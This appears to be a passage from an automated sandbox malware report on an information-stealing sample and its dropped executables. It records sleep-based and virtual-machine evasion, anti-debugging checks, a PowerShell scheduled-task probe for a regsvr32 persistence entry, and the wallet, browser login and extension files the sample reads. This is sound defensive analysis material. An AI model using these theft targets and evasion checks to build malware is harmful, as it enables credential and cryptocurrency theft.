Source: C:\Users\user\Desktop\p199AjsEFs.exe TID: 4508 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe TID: 1280 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3744 Thread sleep time: -40020s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep count: 1330 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3784 Thread sleep time: -2661330s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6292 Thread sleep count: 1219 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6292 Thread sleep time: -2439219s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092 Thread sleep count: 420 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4092 Thread sleep time: -12600000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4052 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6840 Thread sleep count: 1346 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6840 Thread sleep time: -2693346s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6408 Thread sleep count: 1345 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6408 Thread sleep time: -2691345s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 508 Thread sleep count: 1046 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 508 Thread sleep time: -2093046s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1464 Thread sleep count: 1005 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1464 Thread sleep time: -2011005s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe TID: 2156 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6964 Thread sleep count: 49 > 30
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: skotes.exe, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000003.2429279473.000000000138F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2182666348.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.0000000001495000.00000004.00000020.00020000.00000000.sdmp, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3415843852.000000000122A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000002.3415843852.00000000011F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.0000000005640000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696487552p
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.00000000014C5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW>%8M
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: 264662bead.tmp, 00000010.00000002.3396142193.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487552s
Source: 264662bead.tmp, 00000010.00000002.3396142193.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2438824710.00000000006F8000.00000040.00000001.01000000.00000006.sdmp, 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000002.2464400056.0000000000CA7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2507175877.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2519950574.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: p199AjsEFs.exe, 00000000.00000003.2203749308.000000000563B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\p199AjsEFs.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\p199AjsEFs.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0DE2 Start: 051B0DF5 End: 051B0DFB 4_2_051B0DE2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Code function: 4_2_051B0CB9 rdtsc 4_2_051B0CB9
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0021652B mov eax, dword ptr fs:[00000030h] 9_2_0021652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_0021A302 mov eax, dword ptr fs:[00000030h] 9_2_0021A302
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe "C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe "C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: skotes.exe, skotes.exe, 00000009.00000002.3409322231.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: (EVUProgram Manager
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe, 00000004.00000002.2464400056.0000000000CA7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2507175877.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2519950574.00000000003C7000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: o(EVUProgram Manager
Source: HT94GNC6NP3AGR6EM8I9D3647.exe, HT94GNC6NP3AGR6EM8I9D3647.exe, 00000003.00000002.2438824710.00000000006F8000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: @Program Manager
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FD3E2 cpuid 9_2_001FD3E2
Source: C:\Users\user\Desktop\p199AjsEFs.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053900001\91fd14a9f3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 9_2_001FCBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001E65E0 LookupAccountNameA, 9_2_001E65E0
Source: C:\Users\user\Desktop\p199AjsEFs.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: p199AjsEFs.exe, p199AjsEFs.exe, 00000000.00000003.2286309899.00000000055E1000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2275467569.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2274610176.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2281586610.00000000055EB000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2374899727.00000000055E1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 4.2.6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.skotes.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2629584410.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2421834554.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3406474336.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2465081662.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2505620338.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2519790292.00000000001E1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2463197759.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: p199AjsEFs.exe PID: 2268, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2438234450.0000000000331000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2449611202.000000000144E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2391784243.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: HT94GNC6NP3AGR6EM8I9D3647.exe PID: 6316, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: p199AjsEFs.exe String found in binary or memory: Jaxx Liberty
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: p199AjsEFs.exe, 00000000.00000003.2259799476.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: p199AjsEFs.exe String found in binary or memory: ExodusWeb3
Source: p199AjsEFs.exe, 00000000.00000003.2274757871.00000000008CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: p199AjsEFs.exe, 00000000.00000003.2259755643.000000000091E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
